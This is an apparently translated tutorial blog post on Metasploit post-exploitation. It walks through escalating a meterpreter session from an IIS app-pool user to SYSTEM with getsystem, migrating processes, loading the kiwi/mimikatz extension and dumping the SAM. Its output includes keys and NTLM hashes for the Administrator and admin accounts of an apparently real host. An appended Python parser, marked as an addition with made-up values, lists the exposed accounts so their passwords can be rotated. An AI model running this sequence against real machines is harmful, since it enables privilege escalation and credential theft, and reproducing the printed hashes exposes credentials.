KALI LINUX: Using the kiwi (mimikatz) module in MSF


    I. Introduction:

    The kiwi module:
      The mimikatz module has been merged into the kiwi module. Using the kiwi module requires SYSTEM privileges, so before using it we need to elevate the current MSF shell to SYSTEM.

    II. Privilege escalation:

    Escalating to SYSTEM privileges:
    1.1 There are two ways to reach SYSTEM:
      one is that the current session already runs as the administrator user;
      the other is to first escalate to the administrator user by some other means. The administrator user can then run getsystem directly in the meterpreter shell to escalate to SYSTEM.
    1.2 Performing the escalation:

    getuid      # show the user identity of the current session
    getsystem   # automatically try the available escalation techniques
    

    The current session has ordinary privileges:

    meterpreter > getuid
    Server username: IIS APPPOOL\web
    

    Escalation via getsystem succeeded:

    meterpreter > getsystem -t 6
    ...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).
    

    View the process list with ps:

    meterpreter > ps
    
    Process List
    ============
    
     PID   PPID  Name                Arch  Session  User                          Path
     ---   ----  ----                ----  -------  ----                          ----
     0     0     [System Process]
     4     0     System              x64   0
     300   4     smss.exe            x64   0
     316   616   sqlservr.exe        x64   0        NT SERVICE\MSSQLSERVER        C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
     328   616   vsvnhttpsvc.exe     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\VisualSVN Server\bin\vsvnhttpsvc.exe
     360   932   WUDFHost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\WUDFHost.exe
     396   388   csrss.exe           x64   0
     416   720   WmiPrvSE.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
     476   388   wininit.exe         x64   0
     484   468   csrss.exe           x64   1
     572   468   winlogon.exe        x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
     580   1104  taskhostw.exe       x64   2        172_19_0_5\admin              C:\Windows\System32\taskhostw.exe
     616   476   services.exe        x64   0
     632   476   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
     648   616   svchost.exe         x64   2        172_19_0_5\admin              C:\Windows\System32\svchost.exe
     720   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     784   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     880   572   LogonUI.exe         x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
     888   572   dwm.exe             x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
     924   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     932   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1020  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1064  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1096  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1104  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1244  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1264  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     1276  720   ChsIME.exe          x64   2        172_19_0_5\admin              C:\Windows\System32\InputMethod\CHS\ChsIME.exe
     1752  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     1820  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1864  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1892  616   BaradAgent.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Monitor\Barad\BaradAgent.exe
     1968  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1992  616   sqlwriter.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
     2000  616   sgagent.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Stargate\sgagent.exe
     2008  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     2020  616   tat_agent.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\tat_agent\ta
    

    Migrate into another process:

    meterpreter > migrate 3820
    [*] Migrating from 5320 to 3820...
    [*] Migration completed successfully.
    

    Load the extension with load mimikatz:

    meterpreter > load mimikatz
    [!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
    Loading extension kiwi...
      .#####.   mimikatz 2.2.0 20191125 (x64/windows)
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
      '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
    
    Success.
    

    View the help with help kiwi:

    meterpreter > help kiwi
    
    Kiwi Commands
    =============
    
        Command                Description
        -------                -----------
        creds_all              Retrieve all credentials (parsed)
        creds_kerberos         Retrieve Kerberos creds (parsed)
        creds_livessp          Retrieve Live SSP creds
        creds_msv              Retrieve LM/NTLM creds (parsed)
        creds_ssp              Retrieve SSP creds
        creds_tspkg            Retrieve TsPkg creds (parsed)
        creds_wdigest          Retrieve WDigest creds (parsed)
        dcsync                 Retrieve user account information via DCSync (unparsed)
        dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
        golden_ticket_create   Create a golden kerberos ticket
        kerberos_ticket_list   List all kerberos tickets (unparsed)
        kerberos_ticket_purge  Purge any in-use kerberos tickets
        kerberos_ticket_use    Use a kerberos ticket
        kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
        lsa_dump_sam           Dump LSA SAM (unparsed)
        lsa_dump_secrets       Dump LSA secrets (unparsed)
        password_change        Change the password/hash of a user
        wifi_list              List wifi profiles/creds for the current user
        wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)
    

    Some commands related to passwords and credentials:

    creds_all:             # list all credentials
    creds_kerberos:        # list all Kerberos credentials
    creds_msv:             # list all MSV (LM/NTLM) credentials
    creds_ssp:             # list all SSP credentials
    creds_tspkg:           # list all TsPkg credentials
    creds_wdigest:         # list all WDigest credentials
    dcsync:                # retrieve user account information via DCSync
    dcsync_ntlm:           # retrieve a user account's NTLM hash, SID and RID via DCSync
    golden_ticket_create:  # create a golden ticket
    kerberos_ticket_list:  # list Kerberos tickets
    kerberos_ticket_purge: # purge Kerberos tickets
    kerberos_ticket_use:   # use a Kerberos ticket
    kiwi_cmd:              # run a mimikatz command; takes the same command syntax as mimikatz.exe
    lsa_dump_sam:          # dump the SAM from LSA
    lsa_dump_secrets:      # dump LSA secrets
    password_change:       # change a user's password
    wifi_list:             # list the current user's wifi profiles
    wifi_list_shared:      # list shared wifi profiles/creds
    

    The SAM can now be dumped directly:

    meterpreter > lsa_dump_sam
    [+] Running as SYSTEM
    [*] Dumping SAM
    Domain : 172_19_0_5
    SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
    Local SID : S-1-5-21-3925609119-1055855973-2504285507
    
    SAMKey : a7560bed1540bf80158f27e92e672d72
    
    RID  : 000001f4 (500)
    User : Administrator
      Hash NTLM: 3f10b4bc33875a54c357b013abdbbb6e
    
    RID  : 000001f5 (501)
    User : Guest
    
    RID  : 000001f7 (503)
    User : DefaultAccount
    
    RID  : 000003f1 (1009)
    User : admin
      Hash NTLM: 4b37422333f67ebc8778d798ad2af741
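    The `lsa_dump_sam` output above has a fixed, line-oriented layout (Domain / Local SID header, then one `RID` / `User` / optional `Hash NTLM` record per account). When such a dump turns up in an incident, a responder's first question is which local accounts actually had hashes recovered and therefore need their passwords rotated. The parser below, added here as an example and not part of the original post or of the kiwi extension, reads that layout into structured records, checks that the hex and decimal RID on each `RID` line agree, and derives each account's full SID from the `Local SID` line. The sample dump embedded in it is constructed for the example; the SID, SysKey and hash values in it are not real.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the same layout as the lsa_dump_sam output shown in the post.
# Every value here (SID, keys, hashes, account names) is made up for this example.
SAMPLE_DUMP = """\
[+] Running as SYSTEM
[*] Dumping SAM
Domain : WIN-EXAMPLE
SysKey : 00112233445566778899aabbccddeeff
Local SID : S-1-5-21-1111111111-2222222222-3333333333

SAMKey : ffeeddccbbaa99887766554433221100

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 0123456789abcdef0123456789abcdef

RID  : 000001f5 (501)
User : Guest

RID  : 000003e9 (1001)
User : svc_backup
  Hash NTLM: fedcba9876543210fedcba9876543210
"""


@dataclass
class SamAccount:
    rid: int
    user: str
    ntlm: Optional[str] = None  # None when the dump printed no hash for the account


@dataclass
class SamDump:
    domain: str
    local_sid: str
    accounts: List[SamAccount] = field(default_factory=list)

    def sid_of(self, account: SamAccount) -> str:
        """Full account SID: the machine's local SID with the RID appended."""
        return f"{self.local_sid}-{account.rid}"


# One regex per line type in the dump layout.
KV_RE = re.compile(r"^(Domain|Local SID)\s*:\s*(.+?)\s*$")
RID_RE = re.compile(r"^RID\s*:\s*([0-9a-fA-F]+)\s*\((\d+)\)")
USER_RE = re.compile(r"^User\s*:\s*(.+?)\s*$")
HASH_RE = re.compile(r"^\s*Hash NTLM:\s*([0-9a-fA-F]{32})\s*$")


def parse_sam_dump(text: str) -> SamDump:
    """Parse lsa_dump_sam style output into a SamDump of SamAccount records."""
    dump = SamDump(domain="", local_sid="")
    current: Optional[SamAccount] = None
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            if m.group(1) == "Domain":
                dump.domain = m.group(2)
            else:
                dump.local_sid = m.group(2)
            continue
        m = RID_RE.match(line)
        if m:
            # The tool prints the RID in hex and decimal; they must agree.
            if int(m.group(1), 16) != int(m.group(2)):
                raise ValueError(f"inconsistent RID line: {line!r}")
            current = SamAccount(rid=int(m.group(2)), user="")
            dump.accounts.append(current)
            continue
        m = USER_RE.match(line)
        if m and current is not None:
            current.user = m.group(1)
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current.ntlm = m.group(1).lower()
    return dump


def accounts_to_rotate(dump: SamDump) -> List[str]:
    """Names of local accounts whose NTLM hash was present in the dump.

    These are the accounts an incident responder should treat as exposed and
    reset; accounts printed without a hash (e.g. disabled built-ins) are skipped.
    """
    return [a.user for a in dump.accounts if a.ntlm is not None]


if __name__ == "__main__":
    d = parse_sam_dump(SAMPLE_DUMP)
    for a in d.accounts:
        print(f"{d.sid_of(a):<50} {a.user:<16} hash={'yes' if a.ntlm else 'no'}")
    print("rotate:", accounts_to_rotate(d))
```

The RID consistency check is there because a dump copied out of a terminal, as on this page, is easy to corrupt; a mismatch between the hex and decimal RID is a cheap signal that a line was mangled rather than a genuine record.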
    
  Original URL: https://blog.csdn.net/u010025272/article/details/132816216